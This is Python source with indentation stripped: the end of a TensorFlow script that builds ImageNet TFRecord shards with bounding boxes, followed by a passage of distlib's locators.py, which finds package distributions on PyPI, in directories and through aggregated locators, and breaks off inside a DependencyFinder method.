def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist mulitple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
locators.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (
urljoin,
urlparse,
urlunparse,
url2pathname,
pathname2url,
queue,
quote,
unescape,
string_types,
build_opener,
HTTPRedirectHandler as BaseRedirectHandler,
text_type,
Request,
HTTPError,
URLError,
)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata, MetadataInvalidError
from .util import (
cached_property,
parse_credentials,
ensure_slash,
split_filename,
get_project_data,
parse_requirement,
parse_name_and_version,
ServerProxy,
normalize_name,
)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__)
HASHER_HASH = re.compile(r"^(\w+)=([a-f0-9]+)")
CHARSET = re.compile(r";\s*charset\s*=\s*(.*)\s*$", re.I)
HTML_CONTENT_TYPE = re.compile("text/html|application/x(ht)?ml")
DEFAULT_INDEX = "https://pypi.org/pypi"
def get_all_distribution_names(url=None):
"""
Return all distribution names known by an index.
:param url: The URL of the index.
:return: A list of all known distribution names.
"""
if url is None:
url = DEFAULT_INDEX
client = ServerProxy(url, timeout=3.0)
try:
return client.list_packages()
finally:
client("close")()
class RedirectHandler(BaseRedirectHandler):
"""
A class to work around a bug in some Python 3.2.x releases.
"""
# There's a bug in the base version for some 3.2.x
# (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
# returns e.g. /abc, it bails because it says the scheme ''
# is bogus, when actually it should use the request's
# URL for the scheme. See Python issue #13696.
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
newurl = None
for key in ("location", "uri"):
if key in headers:
newurl = headers[key]
break
if newurl is None: # pragma: no cover
return
urlparts = urlparse(newurl)
if urlparts.scheme == "":
newurl = urljoin(req.get_full_url(), newurl)
if hasattr(headers, "replace_header"):
headers.replace_header(key, newurl)
else:
headers[key] = newurl
return BaseRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
"""
A base class for locators - things that locate distributions.
"""
source_extensions = (".tar.gz", ".tar.bz2", ".tar", ".zip", ".tgz", ".tbz")
binary_extensions = (".egg", ".exe", ".whl")
excluded_extensions = (".pdf",)
# A list of tags indicating which wheels you want to match. The default
# value of None matches against the tags compatible with the running
# Python. If you want to match other values, set wheel_tags on a locator
# instance to a list of tuples (pyver, abi, arch) which you want to match.
wheel_tags = None
downloadable_extensions = source_extensions + (".whl",)
def __init__(self, scheme="default"):
"""
Initialise an instance.
:param scheme: Because locators look for most recent versions, they
need to know the version scheme to use. This specifies
the current PEP-recommended scheme - use ``'legacy'``
if you need to support existing distributions on PyPI.
"""
self._cache = {}
self.scheme = scheme
# Because of bugs in some of the handlers on some of the platforms,
# we use our own opener rather than just using urlopen.
self.opener = build_opener(RedirectHandler())
# If get_project() is called from locate(), the matcher instance
# is set from the requirement passed to locate(). See issue #18 for
# why this can be useful to know.
self.matcher = None
self.errors = queue.Queue()
def get_errors(self):
"""
Return any errors which have occurred.
"""
result = []
while not self.errors.empty(): # pragma: no cover
try:
e = self.errors.get(False)
result.append(e)
except self.errors.Empty:
continue
self.errors.task_done()
return result
def clear_errors(self):
"""
Clear any errors which may have been logged.
"""
# Just get the errors and throw them away
self.get_errors()
def clear_cache(self):
self._cache.clear()
def _get_scheme(self):
return self._scheme
def _set_scheme(self, value):
self._scheme = value
scheme = property(_get_scheme, _set_scheme)
def _get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This should be implemented in subclasses.
If called from a locate() request, self.matcher will be set to a
matcher for the requirement to satisfy, otherwise it will be None.
"""
raise NotImplementedError("Please implement in the subclass")
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError("Please implement in the subclass")
def get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This calls _get_project to do all the work, and just implements a caching layer on top.
"""
if self._cache is None: # pragma: no cover
result = self._get_project(name)
elif name in self._cache:
result = self._cache[name]
else:
self.clear_errors()
result = self._get_project(name)
self._cache[name] = result
return result
def score_url(self, url):
"""
Give an url a score which can be used to choose preferred URLs
for a given project release.
"""
t = urlparse(url)
basename = posixpath.basename(t.path)
compatible = True
is_wheel = basename.endswith(".whl")
is_downloadable = basename.endswith(self.downloadable_extensions)
if is_wheel:
compatible = is_compatible(Wheel(basename), self.wheel_tags)
return (
t.scheme == "https",
"pypi.org" in t.netloc,
is_downloadable,
is_wheel,
compatible,
basename,
)
def prefer_url(self, url1, url2):
"""
Choose one of two URLs where both are candidates for distribution
archives for the same version of a distribution (for example,
.tar.gz vs. zip).
The current implementation favours https:// URLs over http://, archives
from PyPI over those from other locations, wheel compatibility (if a
wheel) and then the archive name.
"""
result = url2
if url1:
s1 = self.score_url(url1)
s2 = self.score_url(url2)
if s1 > s2:
result = url1
if result != url2:
logger.debug("Not replacing %r with %r", url1, url2)
else:
logger.debug("Replacing %r with %r", url1, url2)
return result
def split_filename(self, filename, project_name):
"""
Attempt to split a filename in project name, version and Python version.
"""
return split_filename(filename, project_name)
def convert_url_to_download_info(self, url, project_name):
"""
See if a URL is a candidate for a download URL for a project (the URL
has typically been scraped from an HTML page).
If it is, a dictionary is returned with keys "name", "version",
"filename" and "url"; otherwise, None is returned.
"""
def same_project(name1, name2):
return normalize_name(name1) == normalize_name(name2)
result = None
scheme, netloc, path, params, query, frag = urlparse(url)
if frag.lower().startswith("egg="): # pragma: no cover
logger.debug("%s: version hint in fragment: %r", project_name, frag)
m = HASHER_HASH.match(frag)
if m:
algo, digest = m.groups()
else:
algo, digest = None, None
origpath = path
if path and path[-1] == "/": # pragma: no cover
path = path[:-1]
if path.endswith(".whl"):
try:
wheel = Wheel(path)
if not is_compatible(wheel, self.wheel_tags):
logger.debug("Wheel not compatible: %s", path)
else:
if project_name is None:
include = True
else:
include = same_project(wheel.name, project_name)
if include:
result = {
"name": wheel.name,
"version": wheel.version,
"filename": wheel.filename,
"url": urlunparse(
(scheme, netloc, origpath, params, query, "")
),
"python-version": ", ".join(
[".".join(list(v[2:])) for v in wheel.pyver]
),
}
except Exception as e: # pragma: no cover
logger.warning("invalid path for wheel: %s", path)
elif not path.endswith(self.downloadable_extensions): # pragma: no cover
logger.debug("Not downloadable: %s", path)
else: # downloadable extension
path = filename = posixpath.basename(path)
for ext in self.downloadable_extensions:
if path.endswith(ext):
path = path[: -len(ext)]
t = self.split_filename(path, project_name)
if not t: # pragma: no cover
logger.debug("No match for project/version: %s", path)
else:
name, version, pyver = t
if not project_name or same_project(project_name, name):
result = {
"name": name,
"version": version,
"filename": filename,
"url": urlunparse(
(scheme, netloc, origpath, params, query, "")
),
#'packagetype': 'sdist',
}
if pyver: # pragma: no cover
result["python-version"] = pyver
break
if result and algo:
result["%s_digest" % algo] = digest
return result
def _get_digest(self, info):
"""
Get a digest from a dictionary by looking at a "digests" dictionary
or keys of the form 'algo_digest'.
Returns a 2-tuple (algo, digest) if found, else None. Currently
looks only for SHA256, then MD5.
"""
result = None
if "digests" in info:
digests = info["digests"]
for algo in ("sha256", "md5"):
if algo in digests:
result = (algo, digests[algo])
break
if not result:
for algo in ("sha256", "md5"):
key = "%s_digest" % algo
if key in info:
result = (algo, info[key])
break
return result
def _update_version_data(self, result, info):
"""
Update a result dictionary (the final result from _get_project) with a
dictionary for a specific version, which typically holds information
gleaned from a filename or URL for an archive for the distribution.
"""
name = info.pop("name")
version = info.pop("version")
if version in result:
dist = result[version]
md = dist.metadata
else:
dist = make_dist(name, version, scheme=self.scheme)
md = dist.metadata
dist.digest = digest = self._get_digest(info)
url = info["url"]
result["digests"][url] = digest
if md.source_url != info["url"]:
md.source_url = self.prefer_url(md.source_url, url)
result["urls"].setdefault(version, set()).add(url)
dist.locator = self
result[version] = dist
def locate(self, requirement, prereleases=False):
"""
Find the most recent distribution which matches the given
requirement.
:param requirement: A requirement of the form 'foo (1.0)' or perhaps
'foo (>= 1.0, < 2.0, != 1.3)'
:param prereleases: If ``True``, allow pre-release versions
to be located. Otherwise, pre-release versions
are not returned.
:return: A :class:`Distribution` instance, or ``None`` if no such
distribution could be located.
"""
result = None
r = parse_requirement(requirement)
if r is None: # pragma: no cover
raise DistlibException("Not a valid requirement: %r" % requirement)
scheme = get_scheme(self.scheme)
self.matcher = matcher = scheme.matcher(r.requirement)
logger.debug("matcher: %s (%s)", matcher, type(matcher).__name__)
versions = self.get_project(r.name)
if len(versions) > 2: # urls and digests keys are present
# sometimes, versions are invalid
slist = []
vcls = matcher.version_class
for k in versions:
if k in ("urls", "digests"):
continue
try:
if not matcher.match(k):
logger.debug("%s did not match %r", matcher, k)
else:
if prereleases or not vcls(k).is_prerelease:
slist.append(k)
else:
logger.debug(
"skipping pre-release " "version %s of %s",
k,
matcher.name,
)
except Exception: # pragma: no cover
logger.warning("error matching %s with %r", matcher, k)
pass # slist.append(k)
if len(slist) > 1:
slist = sorted(slist, key=scheme.key)
if slist:
logger.debug("sorted list: %s", slist)
version = slist[-1]
result = versions[version]
if result:
if r.extras:
result.extras = r.extras
result.download_urls = versions.get("urls", {}).get(version, set())
d = {}
sd = versions.get("digests", {})
for url in result.download_urls:
if url in sd: # pragma: no cover
d[url] = sd[url]
result.digests = d
self.matcher = None
return result
class PyPIRPCLocator(Locator):
"""
This locator uses XML-RPC to locate distributions. It therefore
cannot be used with simple mirrors (that only mirror file content).
"""
def __init__(self, url, **kwargs):
"""
Initialise an instance.
:param url: The URL to use for XML-RPC.
:param kwargs: Passed to the superclass constructor.
"""
super(PyPIRPCLocator, self).__init__(**kwargs)
self.base_url = url
self.client = ServerProxy(url, timeout=3.0)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
return set(self.client.list_packages())
def _get_project(self, name):
result = {"urls": {}, "digests": {}}
versions = self.client.package_releases(name, True)
for v in versions:
urls = self.client.release_urls(name, v)
data = self.client.release_data(name, v)
metadata = Metadata(scheme=self.scheme)
metadata.name = data["name"]
metadata.version = data["version"]
metadata.license = data.get("license")
metadata.keywords = data.get("keywords", [])
metadata.summary = data.get("summary")
dist = Distribution(metadata)
if urls:
info = urls[0]
metadata.source_url = info["url"]
dist.digest = self._get_digest(info)
dist.locator = self
result[v] = dist
for info in urls:
url = info["url"]
digest = self._get_digest(info)
result["urls"].setdefault(v, set()).add(url)
result["digests"][url] = digest
return result
class PyPIJSONLocator(Locator):
"""
This locator uses PyPI's JSON interface. It's very limited in functionality
and probably not worth using.
"""
def __init__(self, url, **kwargs):
super(PyPIJSONLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError("Not available from this locator")
def _get_project(self, name):
result = {"urls": {}, "digests": {}}
url = urljoin(self.base_url, "%s/json" % quote(name))
try:
resp = self.opener.open(url)
data = resp.read().decode() # for now
d = json.loads(data)
md = Metadata(scheme=self.scheme)
data = d["info"]
md.name = data["name"]
md.version = data["version"]
md.license = data.get("license")
md.keywords = data.get("keywords", [])
md.summary = data.get("summary")
dist = Distribution(md)
dist.locator = self
urls = d["urls"]
result[md.version] = dist
for info in d["urls"]:
url = info["url"]
dist.download_urls.add(url)
dist.digests[url] = self._get_digest(info)
result["urls"].setdefault(md.version, set()).add(url)
result["digests"][url] = self._get_digest(info)
# Now get other releases
for version, infos in d["releases"].items():
if version == md.version:
continue # already done
omd = Metadata(scheme=self.scheme)
omd.name = md.name
omd.version = version
odist = Distribution(omd)
odist.locator = self
result[version] = odist
for info in infos:
url = info["url"]
odist.download_urls.add(url)
odist.digests[url] = self._get_digest(info)
result["urls"].setdefault(version, set()).add(url)
result["digests"][url] = self._get_digest(info)
# for info in urls:
# md.source_url = info['url']
# dist.digest = self._get_digest(info)
# dist.locator = self
# for info in urls:
# url = info['url']
# result['urls'].setdefault(md.version, set()).add(url)
# result['digests'][url] = self._get_digest(info)
except Exception as e:
self.errors.put(text_type(e))
logger.exception("JSON fetch failed: %s", e)
return result
class Page(object):
"""
This class represents a scraped HTML page.
"""
# The following slightly hairy-looking regex just looks for the contents of
# an anchor link, which has an attribute "href" either immediately preceded
# or immediately followed by a "rel" attribute. The attribute values can be
# declared with double quotes, single quotes or no quotes - which leads to
# the length of the expression.
_href = re.compile(
"""
(rel\\s*=\\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\\s\n]*))\\s+)?
href\\s*=\\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\\s\n]*))
(\\s+rel\\s*=\\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\\s\n]*)))?
""",
re.I | re.S | re.X,
)
_base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)
def __init__(self, data, url):
"""
Initialise an instance with the Unicode page contents and the URL they
came from.
"""
self.data = data
self.base_url = self.url = url
m = self._base.search(self.data)
if m:
self.base_url = m.group(1)
_clean_re = re.compile(r"[^a-z0-9$&+,/:;=?@.#%_\\|-]", re.I)
@cached_property
def links(self):
"""
Return the URLs of all the links on a page together with information
about their "rel" attribute, for determining which ones to treat as
downloads and which ones to queue for further scraping.
"""
def clean(url):
"Tidy up an URL."
scheme, netloc, path, params, query, frag = urlparse(url)
return urlunparse((scheme, netloc, quote(path), params, query, frag))
result = set()
for match in self._href.finditer(self.data):
d = match.groupdict("")
rel = (
d["rel1"]
or d["rel2"]
or d["rel3"]
or d["rel4"]
or d["rel5"]
or d["rel6"]
)
url = d["url1"] or d["url2"] or d["url3"]
url = urljoin(self.base_url, url)
url = unescape(url)
url = self._clean_re.sub(lambda m: "%%%2x" % ord(m.group(0)), url)
result.add((url, rel))
# We sort the result, hoping to bring the most recent versions
# to the front
result = sorted(result, key=lambda t: t[0], reverse=True)
return result
class SimpleScrapingLocator(Locator):
"""
A locator which scrapes HTML pages to locate downloads for a distribution.
This runs multiple threads to do the I/O; performance is at least as good
as pip's PackageFinder, which works in an analogous fashion.
"""
# These are used to deal with various Content-Encoding schemes.
decoders = {
"deflate": zlib.decompress,
"gzip": lambda b: gzip.GzipFile(fileobj=BytesIO(d)).read(),
"none": lambda b: b,
}
def __init__(self, url, timeout=None, num_workers=10, **kwargs):
"""
Initialise an instance.
:param url: The root URL to use for scraping.
:param timeout: The timeout, in seconds, to be applied to requests.
This defaults to ``None`` (no timeout specified).
:param num_workers: The number of worker threads you want to do I/O,
This defaults to 10.
:param kwargs: Passed to the superclass.
"""
super(SimpleScrapingLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
self.timeout = timeout
self._page_cache = {}
self._seen = set()
self._to_fetch = queue.Queue()
self._bad_hosts = set()
self.skip_externals = False
self.num_workers = num_workers
self._lock = threading.RLock()
# See issue #45: we need to be resilient when the locator is used
# in a thread, e.g. with concurrent.futures. We can't use self._lock
# as it is for coordinating our internal threads - the ones created
# in _prepare_threads.
self._gplock = threading.RLock()
self.platform_check = False # See issue #112
def _prepare_threads(self):
"""
Threads are created only when get_project is called, and terminate
before it returns. They are there primarily to parallelise I/O (i.e.
fetching web pages).
"""
self._threads = []
for i in range(self.num_workers):
t = threading.Thread(target=self._fetch)
t.setDaemon(True)
t.start()
self._threads.append(t)
def _wait_threads(self):
"""
Tell all the threads to terminate (by sending a sentinel value) and
wait for them to do so.
"""
# Note that you need two loops, since you can't say which
# thread will get each sentinel
for t in self._threads:
self._to_fetch.put(None) # sentinel
for t in self._threads:
t.join()
self._threads = []
def _get_project(self, name):
result = {"urls": {}, "digests": {}}
with self._gplock:
self.result = result
self.project_name = name
url = urljoin(self.base_url, "%s/" % quote(name))
self._seen.clear()
self._page_cache.clear()
self._prepare_threads()
try:
logger.debug("Queueing %s", url)
self._to_fetch.put(url)
self._to_fetch.join()
finally:
self._wait_threads()
del self.result
return result
platform_dependent = re.compile(
r"\b(linux_(i\d86|x86_64|arm\w+)|" r"win(32|_amd64)|macosx_?\d+)\b", re.I
)
def _is_platform_dependent(self, url):
"""
Does an URL refer to a platform-specific download?
"""
return self.platform_dependent.search(url)
def _process_download(self, url):
"""
See if an URL is a suitable download for a project.
If it is, register information in the result dictionary (for
_get_project) about the specific version it's for.
Note that the return value isn't actually used other than as a boolean
value.
"""
if self.platform_check and self._is_platform_dependent(url):
info = None
else:
info = self.convert_url_to_download_info(url, self.project_name)
logger.debug("process_download: %s -> %s", url, info)
if info:
with self._lock: # needed because self.result is shared
self._update_version_data(self.result, info)
return info
def _should_queue(self, link, referrer, rel):
"""
Determine whether a link URL from a referring page and with a
particular "rel" attribute should be queued for scraping.
"""
scheme, netloc, path, _, _, _ = urlparse(link)
if path.endswith(
self.source_extensions + self.binary_extensions + self.excluded_extensions
):
result = False
elif self.skip_externals and not link.startswith(self.base_url):
result = False
elif not referrer.startswith(self.base_url):
result = False
elif rel not in ("homepage", "download"):
result = False
elif scheme not in ("http", "https", "ftp"):
result = False
elif self._is_platform_dependent(link):
result = False
else:
host = netloc.split(":", 1)[0]
if host.lower() == "localhost":
result = False
else:
result = True
logger.debug("should_queue: %s (%s) from %s -> %s", link, rel, referrer, result)
return result
def _fetch(self):
"""
Get a URL to fetch from the work queue, get the HTML page, examine its
links for download candidates and candidates for further scraping.
This is a handy method to run in a thread.
"""
while True:
url = self._to_fetch.get()
try:
if url:
page = self.get_page(url)
if page is None: # e.g. after an error
continue
for link, rel in page.links:
if link not in self._seen:
try:
self._seen.add(link)
if not self._process_download(
link
) and self._should_queue(link, url, rel):
logger.debug("Queueing %s from %s", link, url)
self._to_fetch.put(link)
except MetadataInvalidError: # e.g. invalid versions
pass
except Exception as e: # pragma: no cover
self.errors.put(text_type(e))
finally:
# always do this, to avoid hangs :-)
self._to_fetch.task_done()
if not url:
# logger.debug('Sentinel seen, quitting.')
break
def get_page(self, url):
"""
Get the HTML for an URL, possibly from an in-memory cache.
XXX TODO Note: this cache is never actually cleared. It's assumed that
the data won't get stale over the lifetime of a locator instance (not
necessarily true for the default_locator).
"""
# http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
scheme, netloc, path, _, _, _ = urlparse(url)
if scheme == "file" and os.path.isdir(url2pathname(path)):
url = urljoin(ensure_slash(url), "index.html")
if url in self._page_cache:
result = self._page_cache[url]
logger.debug("Returning %s from cache: %s", url, result)
else:
host = netloc.split(":", 1)[0]
result = None
if host in self._bad_hosts:
logger.debug("Skipping %s due to bad host %s", url, host)
else:
req = Request(url, headers={"Accept-encoding": "identity"})
try:
logger.debug("Fetching %s", url)
resp = self.opener.open(req, timeout=self.timeout)
logger.debug("Fetched %s", url)
headers = resp.info()
content_type = headers.get("Content-Type", "")
if HTML_CONTENT_TYPE.match(content_type):
final_url = resp.geturl()
data = resp.read()
encoding = headers.get("Content-Encoding")
if encoding:
decoder = self.decoders[encoding] # fail if not found
data = decoder(data)
encoding = "utf-8"
m = CHARSET.search(content_type)
if m:
encoding = m.group(1)
try:
data = data.decode(encoding)
except UnicodeError: # pragma: no cover
data = data.decode("latin-1") # fallback
result = Page(data, final_url)
self._page_cache[final_url] = result
except HTTPError as e:
if e.code != 404:
logger.exception("Fetch failed: %s: %s", url, e)
except URLError as e: # pragma: no cover
logger.exception("Fetch failed: %s: %s", url, e)
with self._lock:
self._bad_hosts.add(host)
except Exception as e: # pragma: no cover
logger.exception("Fetch failed: %s: %s", url, e)
finally:
self._page_cache[url] = result # even if None (failure)
return result
_distname_re = re.compile("<a href=[^>]*>([^<]+)<")
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
page = self.get_page(self.base_url)
if not page:
raise DistlibException("Unable to get %s" % self.base_url)
for match in self._distname_re.finditer(page.data):
result.add(match.group(1))
return result
class DirectoryLocator(Locator):
"""
This class locates distributions in a directory tree.
"""
def __init__(self, path, **kwargs):
"""
Initialise an instance.
:param path: The root of the directory tree to search.
:param kwargs: Passed to the superclass constructor,
except for:
* recursive - if True (the default), subdirectories are
recursed into. If False, only the top-level directory
is searched,
"""
self.recursive = kwargs.pop("recursive", True)
super(DirectoryLocator, self).__init__(**kwargs)
path = os.path.abspath(path)
if not os.path.isdir(path): # pragma: no cover
raise DistlibException("Not a directory: %r" % path)
self.base_dir = path
def should_include(self, filename, parent):
"""
Should a filename be considered as a candidate for a distribution
archive? As well as the filename, the directory which contains it
is provided, though not used by the current implementation.
"""
return filename.endswith(self.downloadable_extensions)
def _get_project(self, name):
result = {"urls": {}, "digests": {}}
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(
("file", "", pathname2url(os.path.abspath(fn)), "", "", "")
)
info = self.convert_url_to_download_info(url, name)
if info:
self._update_version_data(result, info)
if not self.recursive:
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(
("file", "", pathname2url(os.path.abspath(fn)), "", "", "")
)
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info["name"])
if not self.recursive:
break
return result
class JSONLocator(Locator):
"""
This locator uses special extended metadata (not available on PyPI) and is
the basis of performant dependency resolution in distlib. Other locators
require archive downloads before dependencies can be determined! As you
might imagine, that can be slow.
"""
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError("Not available from this locator")
def _get_project(self, name):
result = {"urls": {}, "digests": {}}
data = get_project_data(name)
if data:
for info in data.get("files", []):
if info["ptype"] != "sdist" or info["pyversion"] != "source":
continue
# We don't store summary in project metadata as it makes
# the data bigger for no benefit during dependency
# resolution
dist = make_dist(
data["name"],
info["version"],
summary=data.get("summary", "Placeholder for summary"),
scheme=self.scheme,
)
md = dist.metadata
md.source_url = info["url"]
# TODO SHA256 digest
if "digest" in info and info["digest"]:
dist.digest = ("md5", info["digest"])
md.dependencies = info.get("requirements", {})
dist.exports = info.get("exports", {})
result[dist.version] = dist
result["urls"].setdefault(dist.version, set()).add(info["url"])
return result
class DistPathLocator(Locator):
"""
This locator finds installed distributions in a path. It can be useful for
adding to an :class:`AggregatingLocator`.
"""
def __init__(self, distpath, **kwargs):
"""
Initialise an instance.
:param distpath: A :class:`DistributionPath` instance to search.
"""
super(DistPathLocator, self).__init__(**kwargs)
assert isinstance(distpath, DistributionPath)
self.distpath = distpath
def _get_project(self, name):
dist = self.distpath.get_distribution(name)
if dist is None:
result = {"urls": {}, "digests": {}}
else:
result = {
dist.version: dist,
"urls": {dist.version: set([dist.source_url])},
"digests": {dist.version: set([None])},
}
return result
class AggregatingLocator(Locator):
"""
This class allows you to chain and/or merge a list of locators.
"""
def __init__(self, *locators, **kwargs):
"""
Initialise an instance.
:param locators: The list of locators to search.
:param kwargs: Passed to the superclass constructor,
except for:
* merge - if False (the default), the first successful
search from any of the locators is returned. If True,
the results from all locators are merged (this can be
slow).
"""
self.merge = kwargs.pop("merge", False)
self.locators = locators
super(AggregatingLocator, self).__init__(**kwargs)
def clear_cache(self):
super(AggregatingLocator, self).clear_cache()
for locator in self.locators:
locator.clear_cache()
def _set_scheme(self, value):
self._scheme = value
for locator in self.locators:
locator.scheme = value
scheme = property(Locator.scheme.fget, _set_scheme)
def _get_project(self, name):
result = {}
for locator in self.locators:
d = locator.get_project(name)
if d:
if self.merge:
files = result.get("urls", {})
digests = result.get("digests", {})
# next line could overwrite result['urls'], result['digests']
result.update(d)
df = result.get("urls")
if files and df:
for k, v in files.items():
if k in df:
df[k] |= v
else:
df[k] = v
dd = result.get("digests")
if digests and dd:
dd.update(digests)
else:
# See issue #18. If any dists are found and we're looking
# for specific constraints, we only return something if
# a match is found. For example, if a DirectoryLocator
# returns just foo (1.0) while we're looking for
# foo (>= 2.0), we'll pretend there was nothing there so
# that subsequent locators can be queried. Otherwise we
# would just return foo (1.0) which would then lead to a
# failure to find foo (>= 2.0), because other locators
# weren't searched. Note that this only matters when
# merge=False.
if self.matcher is None:
found = True
else:
found = False
for k in d:
if self.matcher.match(k):
found = True
break
if found:
result = d
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for locator in self.locators:
try:
result |= locator.get_distribution_names()
except NotImplementedError:
pass
return result
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
default_locator = AggregatingLocator(
JSONLocator(),
SimpleScrapingLocator("https://pypi.org/simple/", timeout=3.0),
scheme="legacy",
)
locate = default_locator.locate
NAME_VERSION_RE = re.compile(r"(?P<name>[\w-]+)\s*" r"\(\s*(==\s*)?(?P<ver>[^)]+)\)$")
class DependencyFinder(object):
"""
Locate dependencies for distributions.
"""
def __init__(self, locator=None):
"""
Initialise an instance, using the specified locator
to locate distributions.
"""
self.locator = locator or default_locator
self.scheme = get_scheme(self.locator.scheme)
def add_distribution(self, dist):
"""
Add a distribution to the finder. This will update internal information
about who provides what.
:param dist: The distribution to add.
"""
logger.debug("adding distribution %s", dist)
name = dist.key
self.dists_by_name[name] = dist
self.dists[(name, dist.version)] = dist
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug("Add to provided: %s, %s, %s", name, version, dist)
self.provided.setdefault(name, set()).add((version, dist))
def remove_distribution(self, dist):
"""
Remove a distribution from the finder. This will update internal
information about who provides what.
:param dist: The distribution to remove.
"""
logger.debug("removing distribution %s", dist)
name = dist.key
del self.dists_by_name[name]
del self.dists[(name, dist.version)]
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug("Remove from provided: %s, %s, %s", name, version, dist)
